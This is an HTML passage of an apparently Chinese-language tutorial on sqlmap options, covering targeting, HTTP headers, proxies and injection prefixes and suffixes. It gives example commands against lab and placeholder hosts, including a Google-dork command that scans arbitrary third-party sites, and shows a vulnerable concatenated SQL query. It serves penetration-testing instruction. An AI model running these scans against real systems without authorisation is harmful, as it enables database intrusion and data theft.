\u6839\u636e payloads \u548c\/\u6216\u6807\u9898\uff08\u4f8b\u5982\uff1aBENCHMARK\uff09\u8df3\u8fc7\u90e8\u5206\u6d4b\u8bd5\n--update \u66f4\u65b0 sqlmap\n\u5176\u4ed6\u9009\u9879\uff1a\n-z MNEMONICS \u4f7f\u7528\u77ed\u52a9\u8bb0\u7b26\uff08\u4f8b\u5982\uff1a\u201cflu,bat,ban,tec=EU\u201d\uff09\n--alert=ALERT \u5728\u627e\u5230 SQL \u6ce8\u5165\u65f6\u8fd0\u884c OS \u547d\u4ee4\n--answers=ANSWERS \u8bbe\u7f6e\u95ee\u9898\u7b54\u6848\uff08\u4f8b\u5982\uff1a\u201cquit=N,follow=N\u201d\uff09\n--beep \u51fa\u73b0\u95ee\u9898\u63d0\u9192\u6216\u5728\u53d1\u73b0 SQL \u6ce8\u5165\u65f6\u53d1\u51fa\u63d0\u793a\u97f3\n--cleanup \u6307\u5b9a\u79fb\u9664 DBMS \u4e2d\u7684\u7279\u5b9a\u7684 UDF \u6216\u8005\u6570\u636e\u8868\n--dependencies \u68c0\u67e5 sqlmap \u7f3a\u5c11\u4ec0\u4e48\uff08\u975e\u6838\u5fc3\uff09\u4f9d\u8d56\n--disable-coloring \u5173\u95ed\u5f69\u8272\u63a7\u5236\u53f0\u8f93\u51fa\n--gpage=GOOGLEPAGE \u6307\u5b9a\u9875\u7801\u4f7f\u7528 Google dork \u7ed3\u679c\n--identify-waf \u9488\u5bf9 WAF\/IPS\/IDS \u4fdd\u62a4\u8fdb\u884c\u5f7b\u5e95\u7684\u6d4b\u8bd5\n--mobile \u4f7f\u7528 HTTP User-Agent \u6a21\u4eff\u667a\u80fd\u624b\u673a\n--offline \u5728\u79bb\u7ebf\u6a21\u5f0f\u4e0b\u5de5\u4f5c\uff08\u4ec5\u4f7f\u7528\u4f1a\u8bdd\u6570\u636e\uff09\n--purge-output \u5b89\u5168\u5730\u5220\u9664\u8f93\u51fa\u76ee\u5f55\u7684\u6240\u6709\u5185\u5bb9\n--skip-waf \u8df3\u8fc7\u542f\u53d1\u5f0f\u68c0\u6d4b WAF\/IPS\/IDS \u4fdd\u62a4\n--smart \u53ea\u6709\u5728\u4f7f\u7528\u542f\u53d1\u5f0f\u68c0\u6d4b\u65f6\u624d\u8fdb\u884c\u5f7b\u5e95\u7684\u6d4b\u8bd5\n--sqlmap-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f sqlmap shell\n--tmp-dir=TMPDIR \u6307\u5b9a\u7528\u4e8e\u5b58\u50a8\u4e34\u65f6\u6587\u4ef6\u7684\u672c\u5730\u76ee\u5f55\n--web-root=WEBROOT \u6307\u5b9a Web \u670d\u52a1\u5668\u6839\u76ee\u5f55\uff08\u4f8b\u5982\uff1a\"\/var\/www\"\uff09\n--wizard 
\u9002\u5408\u521d\u7ea7\u7528\u6237\u7684\u5411\u5bfc\u754c\u9762<\/code><\/pre>\n<h1>\u5e38\u89c1\u547d\u4ee4<\/h1>\n<p>sqlmap -u <a href=\"http:\/\/sqlmap.com\/index.php?id=1\">http:\/\/sqlmap.com\/index.php?id=1<\/a> -v 1<\/p>\n<p>sqlmap -u &quot;<a href=\"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot;\">http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot;<\/a> -v 1<\/p>\n<p>-u \u548c&#8211;url\u53c2\u6570\u4e00\u6837 \u90fd\u662f\u4ee3\u8868\u586b\u5199\u6d4b\u8bd5\u7684url\u8fde\u63a5 \u5982\u679c\u5b58\u5728&amp;\u7b26\u53f7\u9700\u8981\u6dfb\u52a0\u628aurl\u653e\u5728\u53cc\u5f15\u53f7\u5185<\/p>\n<p>-v \u8868\u793a \u8f93\u51fa\u4fe1\u606f\u8be6\u7ec6\u7a0b\u5ea6\u7ea7\u522b\uff1a0-6\uff08\u9ed8\u8ba4\u4e3a 1\uff09<\/p>\n<blockquote>\n<p>0\uff1a\u53ea\u663e\u793aPython\u56de\u6e90\uff08tracebacks\uff09\uff0c\u9519\u8bef\uff08error\uff09\u548c\u5173\u952e\uff08criticle)\u4fe1\u606f\u3002<\/p>\n<p>1\uff1a\u540c\u65f6\u663e\u793a\u4fe1\u606f(info)\u548c\u8b66\u544a\u4fe1\u606f\uff08warning)\uff08\u9ed8\u8ba4\u4e3a1\uff09<\/p>\n<p>2: \u540c\u65f6\u663e\u793a\u8c03\u8bd5\u4fe1\u606f\uff08debug\uff09<\/p>\n<p>3\uff1a\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684\u6709\u6548\u8f7d\u8377\uff08payloads\uff09<\/p>\n<p>4\uff1a\u540c\u65f6\u663e\u793ahttp\u8bf7\u6c42<\/p>\n<p>5\uff1a\u540c\u65f6\u663e\u793ahttp\u54cd\u5e94\u5934<\/p>\n<p>6\uff1a\u540c\u65f6\u663e\u793ahttp\u54cd\u5e94\u5185\u5bb9<\/p>\n<p>\u7ea7\u522b\u8d8a\u9ad8\uff0c\u4fe1\u606f\u5c31\u8d8a\u8be6\u7ec6\uff0c\u6839\u636e\u9700\u6c42\u9009\u62e9\u5408\u9002\u7684\u8f93\u51fa\u4fe1\u606f<\/p>\n<\/blockquote>\n<h2>\u6307\u5b9a\u76ee\u6807<\/h2>\n<p>\u6307\u5b9a\u67d0\u4e2aurl\u8fdb\u884c\u6d4b\u8bd5<\/p>\n<p>sqlmap -u <a href=\"http:\/\/sqlmap.com\/index.php?id=1\">http:\/\/sqlmap.com\/index.php?id=1<\/a> -v 1<\/p>\n<p>\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dhttp\u8bf7\u6c42\u6d4b\u8bd5<\/p>\n<p>sqlmap -r 
url.txt<\/p>\n<p>\u6587\u4ef6\u5185\u5bb9\u4e3a\u5b8c\u6574\u7684\u539f\u59cb HTTP \u8bf7\u6c42\uff08\u53ef\u4ece Burp \u76f4\u63a5\u590d\u5236\uff09<\/p>\n<p>\u4ece Burp Suite \u6216 WebScarab \u7684\u4ee3\u7406\u65e5\u5fd7\u6587\u4ef6\u4e2d\u8bfb\u53d6\u76ee\u6807\u8bf7\u6c42<\/p>\n<p>sqlmap -l post.txt<\/p>\n<p>\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf<\/p>\n<p>sqlmap -m url.txt<\/p>\n<p>\u4ece\u8c37\u6b4c\u5f15\u64ce\u641c\u7d22\u7ed3\u679c\u626b\u63cf<\/p>\n<p>sqlmap\u53ef\u4ee5\u6d4b\u8bd5\u6ce8\u5165google\u7684\u641c\u7d22\u7ed3\u679c\u4e2d\u7684get\u53c2\u6570<\/p>\n<p>python sqlmap.py -g &quot;inurl:&quot;.php?id=1&quot;&quot;<\/p>\n<p>\u6ce8\u610f\uff1a-g \u4f1a\u5bf9\u641c\u7d22\u7ed3\u679c\u4e2d\u7684\u4efb\u610f\u7b2c\u4e09\u65b9\u7ad9\u70b9\u53d1\u8d77\u6d4b\u8bd5\u8bf7\u6c42\uff0c\u53ea\u80fd\u5728\u83b7\u5f97\u6388\u6743\u7684\u76ee\u6807\u8303\u56f4\u5185\u4f7f\u7528\u3002<\/p>\n<h2>\u8bf7\u6c42<\/h2>\n<p>http\u6570\u636e<\/p>\n<p>\u53c2\u6570 &#8211;data<\/p>\n<p>\u6b64\u53c2\u6570\u662f\u628a\u6570\u636e\u4ee5post\u65b9\u5f0f\u63d0\u4ea4\uff0csqlmap\u4f1a\u81ea\u52a8\u68c0\u6d4bpost\u53c2\u6570<\/p>\n<p>sqlmap.py -u <a href=\"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php\">http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php<\/a> &#8211;data=&quot;id=1&amp;submit=\u67e5\u8be2&quot;<\/p>\n<p>\u53c2\u6570\u62c6\u5206\u5b57\u7b26<\/p>\n<p>\u53c2\u6570\uff1a&#8211;param-del<\/p>\n<p>\u5f53GET\u6216POST\u7684\u6570\u636e\u9700\u8981\u7528\u5176\u4ed6\u5b57\u7b26\u5206\u5272\u6d4b\u8bd5\u53c2\u6570\u7684\u65f6\u5019\u9700\u8981\u7528\u5230\u6b64\u53c2\u6570\u3002<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<p>sqlmap.py -u &quot;<a href=\"http:\/\/www.target.com\/vuln.php&quot;\">http:\/\/www.target.com\/vuln.php&quot;<\/a> &#8211;data=&quot;query=foobar;id=1&quot; &#8211;param-del=&quot;;&quot; -f &#8211;banner &#8211;dbs &#8211;users<\/p>\n<h2>HTTP 
cookie\u5934<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;cookie,&#8211;load-cookies,&#8211;drop-set-cookie<\/p>\n<p>\u8fd9\u4e2a\u53c2\u6570\u5728\u4ee5\u4e0b\u4e24\u4e2a\u65b9\u9762\u5f88\u6709\u7528\uff1a<\/p>\n<p>1\u3001web\u5e94\u7528\u9700\u8981\u767b\u9646\u7684\u65f6\u5019\u3002<\/p>\n<p>2\u3001\u4f60\u60f3\u8981\u5728\u8fd9\u4e9b\u5934\u53c2\u6570\u4e2d\u6d4b\u8bd5SQL\u6ce8\u5165\u65f6\u3002<\/p>\n<p>\u53ef\u4ee5\u901a\u8fc7\u6293\u5305\u628acookie\u83b7\u53d6\u5230\uff0c\u590d\u5236\u51fa\u6765\uff0c\u7136\u540e\u52a0\u5230&#8211;cookie\u53c2\u6570\u91cc\u3002<\/p>\n<p>\u5728HTTP\u8bf7\u6c42\u4e2d\uff0c\u9047\u5230Set-Cookie\u7684\u8bdd\uff0csqlmap\u4f1a\u81ea\u52a8\u83b7\u53d6\u5e76\u4e14\u5728\u4ee5\u540e\u7684\u8bf7\u6c42\u4e2d\u52a0\u5165\uff0c\u5e76\u4e14\u4f1a\u5c1d\u8bd5SQL\u6ce8\u5165\u3002<\/p>\n<p>\u5982\u679c\u4f60\u4e0d\u60f3\u63a5\u53d7Set-Cookie\u53ef\u4ee5\u4f7f\u7528&#8211;drop-set-cookie\u53c2\u6570\u6765\u62d2\u63a5\u3002<\/p>\n<p>\u5f53\u4f60\u4f7f\u7528&#8211;cookie\u53c2\u6570\u65f6\uff0c\u5f53\u8fd4\u56de\u4e00\u4e2aSet-Cookie\u5934\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u8be2\u95ee\u4f60\u7528\u54ea\u4e2acookie\u6765\u7ee7\u7eed\u63a5\u4e0b\u6765\u7684\u8bf7\u6c42\u3002\u5f53&#8211;level\u7684\u53c2\u6570\u8bbe\u5b9a\u4e3a2\u6216\u80052\u4ee5\u4e0a\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u5c1d\u8bd5\u6ce8\u5165Cookie\u53c2\u6570\u3002<\/p>\n<p>HTTP 
User-Agent\u5934<\/p>\n<p>\u53c2\u6570\uff1a&#8211;user-agent,&#8211;random-agent<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u7684HTTP\u8bf7\u6c42\u5934\u4e2dUser-Agent\u503c\u662f\uff1asqlmap\/1.x#stable (https:\/\/sqlmap.org)\uff0c\u8be5\u503c\u660e\u663e\u6807\u8bc6\u4e86\u626b\u63cf\u5668\u8eab\u4efd\uff0c\u5bb9\u6613\u88abWAF\u8bc6\u522b\u5e76\u62e6\u622a\u3002<\/p>\n<p>\u53ef\u4ee5\u4f7f\u7528&#8211;user-agent\u53c2\u6570\u6765\u4fee\u6539\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528&#8211;random-agent\u53c2\u6570\u6765\u968f\u673a\u7684\u4ece.\/txt\/user-agents.txt\u4e2d\u83b7\u53d6\u3002<\/p>\n<p>\u5f53&#8211;level\u53c2\u6570\u8bbe\u5b9a\u4e3a3\u6216\u80053\u4ee5\u4e0a\u7684\u65f6\u5019\uff0c\u4f1a\u5c1d\u8bd5\u5bf9User-Agent\u8fdb\u884c\u6ce8\u5165\u3002<\/p>\n<p>HTTP Referer\u5934<\/p>\n<p>\u53c2\u6570\uff1a&#8211;referer<\/p>\n<p>sqlmap\u53ef\u4ee5\u5728\u8bf7\u6c42\u4e2d\u4f2a\u9020HTTP\u4e2d\u7684referer\uff0c\u5f53&#8211;level\u53c2\u6570\u8bbe\u5b9a\u4e3a3\u6216\u80053\u4ee5\u4e0a\u7684\u65f6\u5019\u4f1a\u5c1d\u8bd5\u5bf9referer\u6ce8\u5165\u3002<\/p>\n<p>\u989d\u5916\u7684HTTP\u5934<\/p>\n<p>\u53c2\u6570\uff1a&#8211;headers<\/p>\n<p>\u53ef\u4ee5\u901a\u8fc7&#8211;headers\u53c2\u6570\u6765\u589e\u52a0\u989d\u5916\u7684http\u5934<\/p>\n<p>HTTP\u8ba4\u8bc1\u4fdd\u62a4<\/p>\n<p>\u53c2\u6570\uff1a&#8211;auth-type,&#8211;auth-cred<\/p>\n<p>\u8fd9\u4e9b\u53c2\u6570\u53ef\u4ee5\u7528\u6765\u767b\u5f55HTTP\u7684\u8ba4\u8bc1\u4fdd\u62a4\uff0c\u652f\u6301\u4e09\u79cd\u65b9\u5f0f<\/p>\n<p>1\u3001Basic<\/p>\n<p>2\u3001Digest<\/p>\n<p>3\u3001NTLM<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<p>python sqlmap.py -u &quot;<a href=\"http:\/\/192.168.136.131\/sqlmap\/mysql\/basic\/get_int.php?id=1&quot;\">http:\/\/192.168.136.131\/sqlmap\/mysql\/basic\/get_int.php?id=1&quot;<\/a> &#8211;auth-type Basic 
&#8211;auth-cred &quot;testuser:testpass&quot;<\/p>\n<h2>HTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;auth-file\uff08\u65e7\u7248 sqlmap \u4e2d\u4e3a &#8211;auth-cert\uff09<\/p>\n<p>\u5f53Web\u670d\u52a1\u5668\u9700\u8981\u5ba2\u6237\u7aef\u8bc1\u4e66\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u9700\u8981\u63d0\u4f9b\u4e00\u4e2aPEM\u683c\u5f0f\u7684\u6587\u4ef6\uff0c\u5176\u4e2d\u540c\u65f6\u5305\u542b\u79c1\u94a5\u548c\u5ba2\u6237\u7aef\u8bc1\u4e66\uff08\u65e7\u7248\u7684 &#8211;auth-cert \u9700\u8981\u4e24\u4e2a\u6587\u4ef6:key_file\uff0ccert_file\uff09\u3002<\/p>\n<p>key_file\u662f\u683c\u5f0f\u4e3aPEM\u7684\u6587\u4ef6\uff0c\u5305\u542b\u7740\u4f60\u7684\u79c1\u94a5\uff0ccert_file\u662f\u683c\u5f0f\u4e3aPEM\u7684\u8bc1\u4e66\u94fe\u6587\u4ef6\u3002\u8fd9\u4e9b\u6587\u4ef6\u542b\u6709\u79c1\u94a5\uff0c\u6ce8\u610f\u4fdd\u62a4\u5176\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<h2>HTTP(S)\u4ee3\u7406<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;proxy,&#8211;proxy-cred\u548c&#8211;ignore-proxy<\/p>\n<p>\u4f7f\u7528&#8211;proxy\u4ee3\u7406\u65f6\u683c\u5f0f\u4e3a\uff1a<a href=\"http:\/\/url:port\">http:\/\/url:port<\/a>\uff08\u4e5f\u652f\u6301 socks4:\/\/ \u548c socks5:\/\/\uff09\u3002<\/p>\n<p>\u5f53HTTP(S)\u4ee3\u7406\u9700\u8981\u8ba4\u8bc1\u65f6\u53ef\u4ee5\u4f7f\u7528&#8211;proxy-cred\u53c2\u6570\uff1ausername:password\u3002<\/p>\n<p>&#8211;ignore-proxy\u5ffd\u7565\u7cfb\u7edf\u9ed8\u8ba4\u7684HTTP(S)\u4ee3\u7406\u8bbe\u7f6e<\/p>\n<h2>HTTP\u8bf7\u6c42\u5ef6\u8fdf<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;delay<\/p>\n<p>\u53ef\u4ee5\u8bbe\u5b9a\u4e24\u4e2aHTTP(S)\u8bf7\u6c42\u95f4\u7684\u5ef6\u8fdf\uff0c\u8bbe\u5b9a\u4e3a0.5\u7684\u65f6\u5019\u662f\u534a\u79d2\uff0c\u9ed8\u8ba4\u662f\u6ca1\u6709\u5ef6\u8fdf\u7684<\/p>\n<h2>\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;timeout<\/p>\n<p>\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2aHTTP(S)\u8bf7\u6c42\u8d85\u8fc7\u591a\u4e45\u5224\u5b9a\u4e3a\u8d85\u65f6\uff0c10.5\u8868\u793a10.5\u79d2\uff0c\u9ed8\u8ba4\u662f30s<\/p>\n<h2>\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;retries<\/p>\n<p>\u5f53HTTP(S)\u8d85\u65f6\u65f6\uff0c\u53ef\u4ee5\u8bbe\u5b9a\u91cd\u65b0\u5c1d\u8bd5\u8fde\u63a5\u6b21\u6570\uff0c\u9ed8\u8ba4\u662f3\u6b21<\/p>\n<h2>\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;randomize<\/p>\n<p>\u53ef\u4ee5\u8bbe\u5b9a\u67d0\u4e00\u4e2a\u53c2
\u6570\u503c\u5728\u6bcf\u4e00\u6b21\u8bf7\u6c42\u4e2d\u968f\u673a\u7684\u53d8\u5316\uff0c\u957f\u5ea6\u548c\u7c7b\u578b\u4f1a\u4e0e\u63d0\u4f9b\u7684\u521d\u59cb\u503c\u4e00\u6837<\/p>\n<h2>\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;scope<\/p>\n<p>\u4f8b\u5982\uff1apython sqlmap.py -l burp.log &#8211;scope=&quot;(www)?\\.target\\.(com|net|org)&quot;<\/p>\n<p>\u6ce8\u610f\u6b63\u5219\u4e2d\u7684\u70b9\u8981\u7528\u53cd\u659c\u6760\u8f6c\u4e49\uff0c\u5426\u5219\u4f1a\u5339\u914d\u4efb\u610f\u5b57\u7b26\uff0c\u53ef\u80fd\u628a\u4e0d\u5728\u6388\u6743\u8303\u56f4\u5185\u7684\u57df\u540d\u4e5f\u9009\u4e2d\u3002<\/p>\n<h2>\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;safe-url,&#8211;safe-freq<\/p>\n<p>\u6709\u7684web\u5e94\u7528\u7a0b\u5e8f\u4f1a\u5728\u4f60\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u7684\u8bf7\u6c42\u65f6\u5c4f\u853d\u6389\u4f60\u4ee5\u540e\u7684\u6240\u6709\u8bf7\u6c42\uff0c\u8fd9\u6837\u5728sqlmap\u8fdb\u884c\u63a2\u6d4b\u6216\u8005\u6ce8\u5165\u7684\u65f6\u5019\u53ef\u80fd\u9020\u6210\u9519\u8bef\u8bf7\u6c42\u800c\u89e6\u53d1\u8fd9\u4e2a\u7b56\u7565\uff0c\u5bfc\u81f4\u4ee5\u540e\u65e0\u6cd5\u8fdb\u884c\u3002<\/p>\n<p>\u5e94\u5bf9\u8fd9\u4e2a\u7b56\u7565\u9700\u8981\u914d\u5408\u4f7f\u7528\u4e24\u4e2a\u53c2\u6570\uff1a<\/p>\n<p>1\u3001&#8211;safe-url\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u62a5\u9519\u7684\u8fde\u63a5\uff0c\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u90fd\u4f1a\u53bb\u8bbf\u95ee\u4e00\u4e0b\u3002<\/p>\n<p>2\u3001&#8211;safe-freq\uff1a\u8bbe\u5b9a\u6bcf\u53d1\u9001\u591a\u5c11\u6b21\u6d4b\u8bd5\u8bf7\u6c42\u540e\u8bbf\u95ee\u4e00\u6b21\u5b89\u5168\u8fde\u63a5\uff0c\u9700\u4e0e&#8211;safe-url\u914d\u5408\u4f7f\u7528\u3002<\/p>\n<h2>\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;skip-urlencode<\/p>\n<p>\u6839\u636e\u53c2\u6570\u4f4d\u7f6e\uff0c\u5b83\u7684\u503c\u9ed8\u8ba4\u5c06\u4f1a\u88abURL\u7f16\u7801\uff0c\u4f46\u662f\u6709\u4e9b\u65f6\u5019\u540e\u7aef\u7684web\u670d\u52a1\u5668\u4e0d\u9075\u5b88RFC\u6807\u51c6\uff0c\u53ea\u63a5\u53d7\u4e0d\u7ecf\u8fc7URL\u7f16\u7801\u7684\u503c\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u7528&#8211;skip-urlencode\u53c2\u6570\u3002<\/p>\
n<h2>\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;eval<\/p>\n<p>\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u9700\u8981\u6839\u636e\u67d0\u4e2a\u53c2\u6570\u7684\u53d8\u5316\uff0c\u800c\u4fee\u6539\u53e6\u4e00\u4e2a\u53c2\u6570\uff0c\u624d\u80fd\u5f62\u6210\u6b63\u5e38\u7684\u8bf7\u6c42\uff0c\u8fd9\u65f6\u53ef\u4ee5\u7528&#8211;eval\u53c2\u6570\u5728\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e\u6240\u5199python\u4ee3\u7801\u505a\u5b8c\u4fee\u6539\u540e\u8bf7\u6c42\u3002<\/p>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<p>python sqlmap.py -u &quot;<a href=\"http:\/\/www.target.com\/vuln.php?id=1&amp;hash=c4ca4238a0b923820dcc509a6f75849b&quot;\">http:\/\/www.target.com\/vuln.php?id=1&amp;hash=c4ca4238a0b923820dcc509a6f75849b&quot;<\/a> &#8211;eval=&quot;import hashlib;hash=hashlib.md5(id).hexdigest()&quot;<\/p>\n<p>\u4e0a\u9762\u7684\u8bf7\u6c42\u5c31\u662f\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636eid\u53c2\u6570\u503c\uff0c\u505a\u4e00\u6b21md5\u540e\u4f5c\u4e3ahash\u53c2\u6570\u7684\u503c<\/p>\n<p>\u6ce8\u610f\uff1a&#8211;eval\u4e2d\u7684\u4ee3\u7801\u4f1a\u5728\u8fd0\u884csqlmap\u7684\u672c\u673a\u4e0a\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\uff0c\u4e0d\u8981\u76f4\u63a5\u7c98\u8d34\u6765\u6e90\u4e0d\u660e\u7684\u4ee3\u7801\u7247\u6bb5\u3002<\/p>\n<h1>\u6ce8\u5165<\/h1>\n<h2>\u6d4b\u8bd5\u53c2\u6570<\/h2>\n<p>\u53c2\u6570\uff1a-p,&#8211;skip<\/p>\n<p>sqlmap\u9ed8\u8ba4\u6d4b\u8bd5\u6240\u6709\u7684GET\u548cPOST\u53c2\u6570\uff0c\u5f53&#8211;level\u7684\u503c\u5927\u4e8e\u7b49\u4e8e2\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5HTTP Cookie\u5934\u7684\u503c\uff0c\u5f53\u5927\u4e8e\u7b49\u4e8e3\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5User-Agent\u548cHTTP Referer\u5934\u7684\u503c\u3002\u4f46\u662f\u4f60\u53ef\u4ee5\u624b\u52a8\u7528-p\u53c2\u6570\u8bbe\u7f6e\u60f3\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\u3002\u4f8b\u5982\uff1a -p 
&quot;id,user-agent&quot;<\/p>\n<p>\u5f53\u4f60\u4f7f\u7528&#8211;level\u7684\u503c\u5f88\u5927\u4f46\u662f\u6709\u4e2a\u522b\u53c2\u6570\u4e0d\u60f3\u6d4b\u8bd5\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528&#8211;skip\u53c2\u6570\u3002<\/p>\n<p>\u4f8b\u5982\uff1a&#8211;skip=&quot;user-agent,referer&quot;<\/p>\n<p>\u5728\u6709\u4e9b\u65f6\u5019web\u670d\u52a1\u5668\u4f7f\u7528\u4e86URL\u91cd\u5199\uff0c\u5bfc\u81f4\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528sqlmap\u6d4b\u8bd5\u53c2\u6570\uff0c\u53ef\u4ee5\u5728\u60f3\u6d4b\u8bd5\u7684\u53c2\u6570\u540e\u9762\u52a0*<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<p>python sqlmap.py -u &quot;<a href=\"http:\/\/targeturl\/param1\/value1*\/param2\/value2\/&quot;\">http:\/\/targeturl\/param1\/value1*\/param2\/value2\/&quot;<\/a><\/p>\n<p>sqlmap\u5c06\u4f1a\u6d4b\u8bd5value1\u7684\u4f4d\u7f6e\u662f\u5426\u53ef\u6ce8\u5165\u3002<\/p>\n<h2>\u6307\u5b9a\u6570\u636e\u5e93<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dbms<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4bweb\u5e94\u7528\u540e\u7aef\u7684\u6570\u636e\u5e93\u662f\u4ec0\u4e48\uff0csqlmap\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/p>\n<p>MySQL\u3001Oracle\u3001PostgreSQL\u3001Microsoft SQL Server\u3001Microsoft Access\u3001SQLite\u3001Firebird\u3001Sybase\u3001SAP 
MaxDB\u3001DB2<\/p>\n<h2>\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;os<\/p>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf\uff0c\u652f\u6301\u7684\u7cfb\u7edf\u6709\uff1aLinux\u3001Windows\u3002<\/p>\n<h2>\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;invalid-bignum<\/p>\n<p>\u5f53\u4f60\u60f3\u6307\u5b9a\u4e00\u4e2a\u62a5\u9519\u7684\u6570\u503c\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\uff0c\u4f8b\u5982\u9ed8\u8ba4\u60c5\u51b5\u4e0bid=13\uff0csqlmap\u4f1a\u53d8\u6210id=-13\u6765\u62a5\u9519\uff0c\u4f60\u53ef\u4ee5\u6307\u5b9a\u6bd4\u5982id=9999999\u6765\u62a5\u9519\u3002<\/p>\n<h2>\u6307\u5b9a\u65e0\u6548\u7684\u903b\u8f91<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;invalid-logical<\/p>\n<p>\u539f\u56e0\u540c\u4e0a\uff0c\u53ef\u4ee5\u6307\u5b9aid=13\u628a\u539f\u6765\u7684id=-13\u7684\u62a5\u9519\u6539\u6210id=13 AND 18=19\u3002<\/p>\n<h2>\u6ce8\u5165payload<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;prefix,&#8211;suffix<\/p>\n<p>\u5728\u6709\u4e9b\u73af\u5883\u4e2d\uff0c\u9700\u8981\u5728\u6ce8\u5165\u7684payload\u7684\u524d\u9762\u6216\u8005\u540e\u9762\u52a0\u4e00\u4e9b\u5b57\u7b26\uff0c\u6765\u4fdd\u8bc1payload\u7684\u6b63\u5e38\u6267\u884c\u3002<\/p>\n<p>\u4f8b\u5982\uff0c\u4ee3\u7801\u4e2d\u662f\u8fd9\u6837\u8c03\u7528\u6570\u636e\u5e93\u7684<\/p>\n<p>$query = &quot;SELECT * FROM users WHERE id=('&quot; . $_GET['id'] . 
&quot;') LIMIT 0, 1&quot;;<\/p>\n<p>\u8fd9\u65f6\u4f60\u5c31\u9700\u8981&#8211;prefix\u548c&#8211;suffix\u53c2\u6570\u4e86\uff1a<\/p>\n<p>python sqlmap.py -u &quot;<a href=\"http:\/\/192.168.136.131\/sqlmap\/mysql\/get_str_brackets.php?id=1&quot;\">http:\/\/192.168.136.131\/sqlmap\/mysql\/get_str_brackets.php?id=1&quot;<\/a> -p id &#8211;prefix &quot;')&quot; &#8211;suffix &quot;AND ('abc'='abc&quot;<\/p>\n<p>\u6ce8\u610f\uff1a\u524d\u540e\u7f00\u4e2d\u7684\u5f15\u53f7\u5fc5\u987b\u662fASCII\u5355\u5f15\u53f7'\uff0c\u4ece\u7f51\u9875\u590d\u5236\u65f6\u4e0d\u8981\u5e26\u5165\u5f2f\u5f15\u53f7\u3002<\/p>\n<p>\u8fd9\u6837\u6267\u884c\u7684SQL\u8bed\u53e5\u53d8\u6210\uff1a$query = &quot;SELECT * FROM users WHERE id=('1') &lt;PAYLOAD&gt; AND ('abc'='abc') LIMIT 0, 